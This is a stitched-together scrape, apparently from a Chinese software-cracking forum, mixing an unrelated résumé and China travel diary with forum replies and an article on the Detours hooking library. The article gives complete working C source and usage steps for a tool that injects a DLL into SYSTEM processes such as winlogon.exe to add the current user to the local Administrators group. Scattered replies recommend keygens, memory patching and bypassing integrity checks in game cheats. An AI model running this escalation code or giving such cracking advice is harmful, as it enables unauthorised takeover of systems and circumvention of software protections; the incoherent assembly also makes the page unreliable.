The forgotten full set of DOS-platform SMC techniques!
The author's résumé:

Objective: To gain employment as a software developer with a cutting-edge company.

Degree: 12/2000, North Carolina State University, Raleigh NC. B.S. degree in Computer Science.

Relevant Courses:
- Computer Graphics: concentrated on the mathematics of 3D computer graphics. Programming assignments in C using OpenGL.
- Computer Graphics Projects: concentrated on graphics algorithms and implementation. Programming assignments in C with minimal use of OpenGL. Implemented a direct volume renderer for the course's final project.
- Introduction to Artificial Intelligence: learned basic techniques for AI, concentrating on search-based algorithms. Programming assignments in Common Lisp.

Technical Skills:
- Languages: C, C++, x86 Assembly Language, Common Lisp, Scheme, Perl, Java, Forth.
- X Windows programming using both Xlib and GTK+.
- Unix device driver development.
- Graphics APIs: OpenGL, GLUT, SDL, VTK.
- Published "Extending DOS Executables" in Issue No. 7 of the Assembly Programming Journal.

Business Experience:

5/2001 - 7/2003, Tech Source Inc., Altamonte Springs FL. Software Engineer, Device Driver Group.
- Developed PCI graphics card device drivers for Linux and Solaris. This included kernel level programming and close cooperation with the X server developers.
- Developed Solaris firmware for Tech Source's graphics cards using Sun's OpenBoot firmware architecture.
- Part of a major project to support Tech Source's graphics cards on OpenVMS. Ported device drivers, set up the development environment, and learned the ins and outs of OpenVMS, all in close collaboration with Compaq.
- Ported kernel modules for Linux kernel 2.2.x to the 2.4 kernel.
- Researched and developed a Solaris application to monitor filesystem events.
- Assisted in adding Japanese language support to a large application.
- Miscellaneous Linux duties (rpm packaging, 3D/DRI setup).

7/2000 - 4/2001, Condensed Matter Theory Group at NCSU, Raleigh NC. Programmer.
- Worked independently to develop a Linux application to visualize electron density volume data. All development was done in C using the GNU tools and GTK+.
- Responsible for a major rewrite of the group's molecular visualization tool, Rotmovie. I ported the old Rotmovie from C to C++ and rewrote all of the graphics functions to make use of The Visualization Toolkit (VTK). I also added a considerable amount of functionality to the program, such as the ability to view electron density isosurfaces. In addition, I rewrote the graphical user interface to use GTK+.

1/1999 - 8/1999, Object Technology International, Raleigh, NC. Co-op.
- Helped design, test, and implement a GUI framework for embedded Java.
- Worked on a Linux/X Windows port of a graphics library for embedded systems.

Summer 1998, Red Hat Software, Durham, NC. Intern.
- Wrote Perl scripts to simplify web and system administration tasks.
- Assisted QA team with bug testing and fixing.

Summer 1997, Jackson Technical Services, Monroe, NC. Intern.
- C programming in a DOS development environment.
- Wrote modules to extend the capabilities of a large database.
The forgotten full set of DOS-platform SMC techniques!
About the author's trip to Beijing:

A Trip to China

Tuesday, May 22 - Arrival in Beijing
We arrived in Beijing after a relatively uneventful 13 hour flight. The only interesting event was the scenery as we flew over Siberia. That is one inhospitable place! We arrived at the Beijing airport at approximately 2:00 PM. My exhaustion due to the long flight was exceeded only by my excitement at finally being in China. The first thing I noticed as we left the airport were the huge billboards plastered with images of Arnold Schwarzenegger hawking various electronic appliances. Absolutely hilarious! It turns out that Arnold would follow us all over China. After stopping off at the hotel, we went out to grab some food and have a look around the city. First off, we took a cab to the Qianmen area just south of Tiananmen Square. We would come back to this area a lot as it had lots of shopping, an internet cafe, and Western restaurants (McDonalds and KFC!). Tonight though, we weren't looking for Western food. We ate at the famous Peking Duck instead. Both Richard Nixon and Fidel Castro had eaten at this restaurant in the past, and I must say that I thought the food was excellent, not to mention cheap considering its quality. I also had my first taste of Beijing Beer, an excellent Chinese rice-based beer.

Wednesday, May 23 - Temple of Heaven, Forbidden City
We all woke up ridiculously early, approx. 4:00 AM (our internal clocks were completely screwed up due to the time difference), so we headed out to the Temple of Heaven park at about 5:30 or so. Personally, I was mainly hoping to see people practicing Taijiquan. The park itself is a large area dotted with trees and crisscrossed by dirt and stone paths surrounding the Temple of Heaven (Tiantan). Spread throughout the park were Chinese people of all ages practicing Qigong or Taijiquan, meditating, and playing badminton. Yells and grunts from practitioners of martial arts carried through the trees as elderly Chinese men and women moved silently and gracefully through the postures of Taijiquan. We were the only Westerners in sight. After a while, with a little encouragement from Ran and Todd, I gathered the nerve to join in with a large group practicing Taiji. I did not know the form they were practicing, it may have been Chen style, but I did the best that I could. Afterwards, I found a place by myself and practiced the first 2 sections of the style I'm learning, 108 Wudang Mountain Taijiquan. I attracted a number of interested observers. Of course, I can't speak Chinese but Ran explained to them that I studied Taiji back in the States. It was a neat experience, and I'm glad I had a chance to practice Taiji amongst the Chinese people. After a while, we left the park and began to make our way down a long, elevated, stone road towards the temple. More people were practicing Taiji along the road and one group in particular was very interesting. They were all carrying swords and were being led through the form by an impressive looking Chinese man who carried his sword like he knew how to use it. After waiting a few minutes for the ticket office to open, we bought our tickets to the Temple of Heaven. Both Todd and I were surprised at the cheap cost of admission, being used to American prices. The temple was pretty, a nice example of Chinese architecture, but to me it wasn't as exciting as the nearby park. After lunch we headed out to the Forbidden City.

Thursday, May 24 - The Great Wall

Friday, May 25 - Train Station
It was crowded and it smelt funny, but I shouldn't complain. You go to the train station for cheap-ass transportation and nothing more. Well, if my Chinese was better I probably could have enjoyed the company of the other travelers. We took an overnight sleeper to Tai Shan, about an 8 hour train ride.

Saturday, May 26 - Tai Shan
We arrived at the base of Tai Shan at approximately 7:00 AM, and were greeted by a somewhat dirty little town, nothing at all like the modern face which Beijing presented. Although the city and hotel were somewhat disappointing, the mountain itself would not leave us dissatisfied. Tai Shan is an absolutely magical place. The bottom portion of the 6,293 step stairway up the mountainside would prove to be quite a bit easier than the latter stages, though it seemed difficult enough at the time. This bottom portion was sprinkled with Taoist (and a few Buddhist) shrines, tombstone-like stones engraved with beautiful calligraphy, and the merchant stands which are a consistent presence throughout the journey. The mountain itself is a microcosm of Chinese culture, history, spirituality, and entrepreneurship. As we marched up the mountain everything became more and more beautiful: the calligraphy, the lush mountain vistas, everything. To me, the calligraphy was especially beautiful. Most of it was chiseled into rock faces and painted red. The most magnificent of all was a poem carved into a sheer cliff face several hundred feet from the path. Each character is nearly one meter wide and I imagine that the whole poem must have been over one hundred feet tall and half as many wide. Also noteworthy were a couple of poems by Chairman Mao. When we finally made it to the summit, after nearly 6 hours of hiking, it was as if we had stepped into another world, or perhaps a fairy tale. The view of the surrounding mountains and the path that led us there was exquisite. We stayed at the top long enough to explore the village, take some pictures, and watch the sunset. The trip down in the dark proved to be a bit harrowing, but luckily we managed to catch a bus at the halfway point. All in all, 8.5 hours of climbing. The whole trip was so invigorating. The closer to the top I got, the looser my muscles became and the more energy I had. Until, once I reached Sky Road at the summit, I was bounding up steps.

Sunday, May 27 - Friday, June 1 - Shanghai
Shanghai is awesome. Our hotel here is badass, and we have satellite TV! At 14 million people, this is the biggest city I've been to. In a lot of ways, it's similar to how I picture New York, only without the crime and a lot cheaper. There are tall buildings everywhere, many of them lit up in interesting colors at night. Another thing you notice quickly about Shanghai is that there are shopping malls everywhere. There are giant 10 story malls, underground malls, street malls, and basically every other type of mall except for the American strip-mall.

Saturday, June 2 - Guilin
Today we took a boat ride down the famous Lijiang, and it is easy to see how this area became known as one of the most beautiful locations on Earth. We were especially fortunate today because it was rainy and misty, the best weather for a sight-seeing trip down the Lijiang. The mist hung low over and between the karst formations, lending an otherworldly and mysterious air to the already beautiful landscape. In addition to the boat ride, we stopped to explore Crown Cave. Crown Cave is the 2nd largest of the caves in the area, and like most of them, it is filled with odd rock formations such as: a six-fingered hand, a parrot, a bear, a turtle, a frog, a monkey atop a column, plus many others. It was really strange how closely the formations resembled real-life objects. It was all made even more beautiful by the colored lights that were placed around the cave. Another neat feature of the cave was an underground river. Several rock bridges spanned the river and we also got to take a boat ride down a section of it. The whole underground exploration thing reminded me of years I spent playing Dungeons and Dragons as a kid. After returning from our cruise, we met up with the cabbie who took us to Guilin from the airport and went out to dinner. Cab drivers in China are great, not only do they drive you around, they know the city better than anyone and often serve as travel agents. Our cabbie took us to a nice Chinese restaurant, got us a private room there, and actually had dinner with us! Speaking of dinner, it turned out to be quite an experience. At the front of the restaurant were various cages and tanks holding an assortment of animals (dishes). In order to prove that their food was fresh, the customer goes with the waiter and selects the animal(s) he wants to eat and watches the waiter kill it (them) right before his eyes. We sentenced one crab, a rare subterranean fish, a chicken, and a rodent-like thing that we think was a chinchilla to death. We were going to order rabbit, but it was just too cute. Overall, the food was good, but different from what I'm accustomed to.

Sunday, June 3 - Guilin
We rented our cabbie from the night before for the day and she took us to various tourist sights within the city, the coolest of which was Reed Flute Cave. Since I've already talked about caves, I'll just say that it was pretty similar to Crown Cave. After driving around town for a while we went to KFC and then to the airport to catch our flight to Hainan island.

Monday, June 4 - Hainan
Hainan Island is China's version of Hawaii. It's tropical, the water is clear and warm, and there are lush mountains all over the island. Actually, Hainan is better than Hawaii because it's a lot cheaper and a lot less crowded. I've never been to Hawaii, but Todd has and he says that Hainan beats the pants off Hawaii. Our hotel is magnificent and only $90 a night, of which my share is $45 (Todd and I are sharing a room to save money). Our room has an ocean facing patio which is really nice. I'm actually writing this from the patio. The mood out here is very conducive to writing. You can hear the soft rumble of the waves and the view is spectacular. I've filled in a couple of journal entries while sitting out here.

Tuesday, June 5 - Hainan
Today, we hung out at the hotel/beach all day. We also played a lot of Chinese chess, including a 4.5 hour marathon between Todd and me which ended in a stalemate. I got a little sunburnt, but that's OK.

Wednesday, June 6 - Hainan
After two days of rest, it was time for a little adventure. On the slate for today is the minority village, the shooting range, and scuba diving. The minority village is sort of like an Indian reservation in America. I think there were 3 different minority groups living in this particular village. It was a lot of fun learning about the customs and cultures of these Chinese minorities. We got to see lots of neat performances as well as partake in a marriage ceremony (something that our girlfriends would take issue with later)! The next stop was the shooting range, where we got to live out a variety of testosterone-induced fantasies. Both Todd and I tried our hand at firing AK-47's while Ran fired a couple of rounds from a 17mm anti-aircraft gun!

Thursday, June 7 - Back to Beijing
Why does everyone write packers in assembly?
Write it in .NET.
How do you debug a program written in PB?
Search the forum; there is a debugger.
How can I modify a packed program?
Originally posted by 樱花散落: search for "伪装".
detours 2.0
Good stuff.

Using the Detours library to obtain NT administrator privileges
by 陈志敏

Detours is a function library developed by Microsoft (source code freely available at http://research.microsoft.com/sn/detours) for modifying the in-memory image of a running program, so that a program's behaviour can be changed even without its source code. Its concrete uses are:
- intercepting Win32 API calls and redirecting them to your own routines, thereby customising the Win32 API;
- creating a new thread in an already-running process, loading your own code into it and running it.

This article briefly introduces how Detours works and how its library functions are used, and uses them to write a Windows NT program that lets a user holding the "Debug programs" user right become a system administrator. The appendix modifies that program with the Detours library functions so that an ordinary user can become a system administrator (on NT4 SP3).

1. How Detours works

1.1 Memory management of Win32 processes

As is well known, Windows NT implements virtual memory, and every Win32 process has a 4 GB virtual address space. For the details of a Win32 process's virtual memory layout and the operations on it, see the Win32 API reference; only the points relevant to Detours are listed here:

(1) The instructions a process executes also live in its virtual address space.
(2) VirtualProtectEx can change the protection of the pages holding instructions to read/write/execute, after which their contents can be overwritten, thereby modifying a running program.
(3) VirtualAllocEx lets one process allocate virtual memory inside another running process; VirtualProtectEx then makes those pages read/write/execute, and the instructions to run are written in as raw machine code, thereby injecting arbitrary code into a running process.

1.2 How Win32 API interception works

Detours defines three concepts:

(1) Target function: the function to intercept, usually a Windows API.
(2) Trampoline function: a copy of the target function. Because Detours will overwrite the target, it first saves a copy; this both preserves the target's calling semantics and makes later restoration easy.
(3) Detour function: the function that replaces the target.

Detours writes a JMP Address_of_Detour_Function instruction (5 bytes in total) at the start of the target function, redirecting calls to the target into the detour, and forms the trampoline from the target's first 5 bytes followed by JMP Address_of_Target_Function+5. For example:

Before interception:

```
Target_Function:        ; target entry; below is a hypothetical, typical prologue
    push ebp
    mov  ebp, esp
    push eax
    push ebx
Trampoline:             ; the remainder of the target function
    ...
```

After interception:

```
Target_Function:
    jmp  Detour_Function
Trampoline:             ; the remainder of the target function
    ...
Trampoline_Function:    ; trampoline entry; first 5 bytes identical to the target
    push ebp
    mov  ebp, esp
    push eax
    push ebx
    jmp  Target_Function+5   ; jump back and continue executing the target
```

1.3 Loading a DLL into a running process

The steps are:

(1) Create a ThreadFunction whose only content is a call to LoadLibrary.
(2) Use VirtualAllocEx to allocate a region of virtual memory in the running process and change its protection to read/write/execute.
(3) Write the machine code of ThreadFunction into that region.
(4) Use CreateRemoteThread to create a thread in that process, passing the start address of the allocated region as the thread function's address. This loads a DLL into the running process, and through the DLL's DllMain you can then run your own code inside it.

2. Using the Detours library functions

Because the Detours package ships without a help file, the interfaces below were worked out purely from reading the source code.

1. PBYTE WINAPI DetourFindFunction(PCHAR pszModule, PCHAR pszFunction)
Purpose: find the entry address of a function in a DLL.
Parameters: pszModule is the DLL name, pszFunction is the function name.
Returns: the entry address of the function named pszFunction in the DLL named pszModule.
Note: besides using GetProcAddress, DetourFindFunction also parses the DLL's file headers directly, so it can locate some entry points that GetProcAddress cannot.

2. DETOUR_TRAMPOLINE(trampoline_prototype, target_name)
Purpose: this macro generates a trampoline function for the target function named target_name; afterwards, calling trampoline_prototype is semantically equivalent to calling the target.

3. BOOL WINAPI DetourFunctionWithTrampoline(PBYTE pbTrampoline, PBYTE pbDetour)
Purpose: intercept the target function with the detour function.
Parameters: pbTrampoline is the trampoline_prototype obtained from DETOUR_TRAMPOLINE; pbDetour is the entry address of the detour function.

4. BOOL WINAPI DetourRemoveWithTrampoline(PBYTE pbTrampoline, PBYTE pbDetour)
Purpose: restore the target function.
Parameters: pbTrampoline is the trampoline_prototype obtained from DETOUR_TRAMPOLINE; pbDetour is the entry address of the detour function.

5. BOOL WINAPI ContinueProcessWithDll(HANDLE hProcess, LPCSTR lpDllName)
Purpose: load a DLL into a running process.
Parameters: hProcess is a handle to the process; lpDllName is the name of the DLL to load.

3. Example program

The use of the Detours library functions is illustrated with a program that lets a user holding the "Debug programs" user right become a system administrator. The idea is to find a process running under the System account, such as spoolss.exe, rpcss.exe, winlogon.exe or services.exe, and use ContinueProcessWithDll to inject into it a DLL that adds the current user to the local Administrators group. Because the DLL runs in the security context of that process, it has the necessary rights.

First, the DLL:

```c
/* admin.dll: when loaded into a process, adds the user named szAccountName
   to the local Administrators group. */
#include <windows.h>
#include <lm.h>        /* NetLocalGroupAddMembers, LOCALGROUP_MEMBERS_INFO_3 */
#include <string.h>
#pragma comment(lib, "netapi32.lib")

/* A shared data section provides the inter-process communication:
   szAccountName is the user name, bPrepared says whether it has been set. */
#pragma data_seg(".MYSHARE")
BOOL    bPrepared = FALSE;
wchar_t szAccountName[100] = {0};
#pragma data_seg()
#pragma comment(linker, "/SECTION:.MYSHARE,RWS")

/* The launcher calls SetAccountName to set the user to add to Administrators
   and to tell DllMain that szAccountName is initialised, so that ElevatePriv
   can run when the DLL is later loaded into the target process. */
__declspec(dllexport) VOID WINAPI SetAccountName(wchar_t *Name)
{
    wcsncpy(szAccountName, Name, sizeof(szAccountName) / sizeof(szAccountName[0]) - 1);
    szAccountName[sizeof(szAccountName) / sizeof(szAccountName[0]) - 1] = L'\0';
    bPrepared = TRUE;
}

/* Add the user named szAccountName to the local Administrators group. */
__declspec(dllexport) VOID WINAPI ElevatePriv(void)
{
    LOCALGROUP_MEMBERS_INFO_3 account;
    account.lgrmi3_domainandname = szAccountName;
    NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1);
}

BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, PVOID lpReserved)
{
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:  /* the remote LoadLibrary call delivers this one;
                                 the original handled only DLL_THREAD_ATTACH */
    case DLL_THREAD_ATTACH:
        if (bPrepared)
            ElevatePriv();
        break;
    }
    return TRUE;
}
```

Then the program:

```c
/* AddMeToAdministrators.exe: adds the current user to the local Administrators
   group. Usage:
   (1) In Task Manager, note the process ID of spoolss.exe, rpcss.exe,
       winlogon.exe or services.exe.
   (2) Run AddMeToAdministrators.exe procid, where procid is the ID from (1).
   (3) Log off and log on again; User Manager now shows you in the local
       Administrators group. */
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <detours.h>   /* ContinueProcessWithDll (Detours 1.x) */
#pragma comment(lib, "advapi32.lib")
#pragma comment(lib, "shell32.lib")   /* CommandLineToArgvW */
#pragma comment(lib, "detours.lib")

/* Exported by admin.dll; link against its import library. */
extern VOID WINAPI SetAccountName(wchar_t *Name);

/* GetCurrentUser: obtain our own DOMAIN\user name. */
void GetCurrentUser(wchar_t *szName)
{
    HANDLE hProcess, hAccessToken;
    wchar_t InfoBuffer[1000], szAccountName[200], szDomainName[200];
    PTOKEN_USER pTokenUser = (PTOKEN_USER)InfoBuffer;
    DWORD dwInfoBufferSize, dwAccountSize = 200, dwDomainSize = 200;
    SID_NAME_USE snu;

    hProcess = GetCurrentProcess();
    OpenProcessToken(hProcess, TOKEN_READ, &hAccessToken);
    GetTokenInformation(hAccessToken, TokenUser, InfoBuffer, sizeof(InfoBuffer),
                        &dwInfoBufferSize);
    LookupAccountSidW(NULL, pTokenUser->User.Sid, szAccountName, &dwAccountSize,
                      szDomainName, &dwDomainSize, &snu);
    CloseHandle(hAccessToken);
    wcscpy(szName, szDomainName);
    wcscat(szName, L"\\");
    wcscat(szName, szAccountName);
}

/* EnablePrivilege: enable the "Debug programs" user right in our own token. */
BOOL EnablePrivilege(LPCTSTR szPrivName, BOOL fEnable)
{
    HANDLE hToken;
    TOKEN_PRIVILEGES tp;

    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
        return FALSE;
    tp.PrivilegeCount = 1;
    LookupPrivilegeValue(NULL, szPrivName, &tp.Privileges[0].Luid);
    tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;
    AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    /* AdjustTokenPrivileges returns TRUE even when the privilege is not held;
       GetLastError() == ERROR_NOT_ALL_ASSIGNED is the case that matters. */
    return GetLastError() == ERROR_SUCCESS;
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR lpszCmdLine, int nCmdShow)
{
    INT argc;
    WCHAR **argv = CommandLineToArgvW(GetCommandLineW(), &argc);
    INT nProcessId = -1;
    HANDLE gNewHandle;
    wchar_t szName[100];

    if (argc != 2) {
        wprintf(L"usage %s pid\n", argv[0]);
        return 1;
    }
    nProcessId = _wtoi(argv[1]);
    printf("%d\n", nProcessId);

    /* ContinueProcessWithDll needs a handle to winlogon.exe (etc.) that allows
       reading/writing its memory and creating threads in it; EnablePrivilege
       gives this process that ability. */
    if (!EnablePrivilege(SE_DEBUG_NAME, TRUE)) {
        printf("AdjustTokenPrivilege Fail %u\n", (UINT)GetLastError());
        return 1;
    }
    gNewHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, nProcessId);
    if (!gNewHandle) {
        printf("OpenProcess Fail %u\n", (UINT)GetLastError());
        return 1;
    }
    GetCurrentUser(szName);
    SetAccountName(szName);
    /* ContinueProcessWithDll takes an ANSI path (LPCSTR). */
    if (!ContinueProcessWithDll(gNewHandle, "c:\\temp\\admin.dll")) {
        printf("ContinueProcessWithDll failed %u\n", (UINT)GetLastError());
        return 3;
    }
    return 0;
}
```

Because the "Debug programs" user right is granted only to administrators by default, this does not create a security hole. But the program does reveal that the "Debug programs" right is in effect the supreme user right and must only be granted to trusted users.

4. Conclusion

Detours is a powerful tool that provides a simple, easy-to-use function interface for intercepting Win32 API calls and for loading a DLL into a running process.
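The two jumps in section 1.2 are the whole trick, and the part people get wrong is the rel32 arithmetic: an x86 E9 jump is relative to the end of its own 5-byte encoding, and the trampoline's return jump must be computed from the trampoline's address, not the target's. The following is an added example, not code from the article or from the Detours library: it builds the exact bytes Detours would write for the article's hypothetical prologue (push ebp; mov ebp,esp; push eax; push ebx = 55 8B EC 50 53) at made-up 32-bit addresses, without touching any process memory or page protections. It also generalises to prologues longer than 5 bytes, where the trampoline must jump back to target+prologue_len rather than target+5.

```c
/* Added example: the byte-level arithmetic behind a 5-byte x86 inline hook
   (the Detours "target / trampoline / detour" scheme). Pure computation:
   nothing here writes to process memory. All addresses are hypothetical. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define JMP_REL32_LEN 5   /* E9 xx xx xx xx */

/* rel32 operand of "jmp dest" encoded at jmp_addr. The displacement is taken
   from the END of the 5-byte instruction; unsigned 32-bit wraparound yields
   the two's-complement encoding for backward jumps for free. */
uint32_t jmp_rel32(uint32_t jmp_addr, uint32_t dest)
{
    return dest - (jmp_addr + JMP_REL32_LEN);
}

/* Emit "jmp dest" into out, as if the instruction were located at jmp_addr. */
static void emit_jmp(uint8_t *out, uint32_t jmp_addr, uint32_t dest)
{
    uint32_t rel = jmp_rel32(jmp_addr, dest);
    out[0] = 0xE9;
    out[1] = (uint8_t)(rel);          /* little-endian operand */
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* Build both halves of the hook.
   prologue / prologue_len : the first WHOLE instructions of the target, which
     must total at least 5 bytes and must not be position-dependent (no
     relative jmp/call, no RIP-relative data); otherwise copying them verbatim
     into the trampoline is wrong. Detours decodes instruction lengths to find
     this boundary; here the caller supplies it.
   patch[5]               : bytes to write at target  (jmp detour)
   trampoline[]           : copied prologue + jmp back to target+prologue_len
   Returns the trampoline length, or 0 if the inputs are unusable. */
size_t build_detour(uint32_t target, uint32_t detour, uint32_t trampoline_addr,
                    const uint8_t *prologue, size_t prologue_len,
                    uint8_t patch[JMP_REL32_LEN],
                    uint8_t *trampoline, size_t trampoline_cap)
{
    if (prologue_len < JMP_REL32_LEN ||
        trampoline_cap < prologue_len + JMP_REL32_LEN)
        return 0;

    emit_jmp(patch, target, detour);                 /* target: jmp detour     */
    memcpy(trampoline, prologue, prologue_len);      /* saved original bytes   */
    emit_jmp(trampoline + prologue_len,
             trampoline_addr + (uint32_t)prologue_len, /* where this jmp lives */
             target + (uint32_t)prologue_len);          /* resume past the patch */
    return prologue_len + JMP_REL32_LEN;
}

static void hexdump(const char *label, const uint8_t *p, size_t n)
{
    printf("%-12s", label);
    for (size_t i = 0; i < n; i++) printf("%02X ", p[i]);
    printf("\n");
}

int main(void)
{
    /* The article's hypothetical prologue: push ebp; mov ebp,esp; push eax; push ebx */
    const uint8_t prologue[] = { 0x55, 0x8B, 0xEC, 0x50, 0x53 };
    uint8_t patch[JMP_REL32_LEN], tramp[16];
    /* Hypothetical addresses: target in a system DLL, detour and trampoline in our module. */
    size_t n = build_detour(0x77E50000u, 0x00401000u, 0x00403000u,
                            prologue, sizeof prologue,
                            patch, tramp, sizeof tramp);
    hexdump("patch:", patch, sizeof patch);   /* E9 FB 0F 5B 88 */
    hexdump("trampoline:", tramp, n);         /* 55 8B EC 50 53 E9 FB CF A4 77 */
    return 0;
}
```

Run it and disassemble the two dumps to convince yourself: the patch decodes to `jmp 0x00401000` when placed at 0x77E50000, and the trampoline's final `jmp` decodes to `jmp 0x77E50005` when the trampoline sits at 0x00403000. The real library additionally changes page protection (section 1.1), flushes the instruction cache, and refuses prologues whose first instructions are relative branches; a hand-rolled hook that skips the prologue-length check is the usual cause of a crash the first time the hooked API is called.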
Is there a tool that can extract a specified code section from an executable?
There is a keygen built that way, released by bbs.5icrack.com.
[Original] Analysis of the registration algorithm of the splash-screen modification tool InnoCustomize
Just use the universal breakpoint and you're done; no need for DeDe.
EncryptPE 2004.8.10 SpecialEdition
If 8.10 can be injected, there is no reason the new version can't be injected too.
[Help] Yesterday I cracked a few PPC programs with IDA, but I'm frustrated......
There should be. PPC is just a device type; the OS is Windows CE.
Problems caused by modifying a DLL file
Originally posted by dsxu8: For game cheats, EXEs and DLLs all carry MD5 checks now. Just do an in-memory patch, or an injected patch. Either works, and there are plenty of tutorials.
Could some expert take a look at this DLL file?
Memory patch.
Problems caused by modifying a DLL file
Self-check.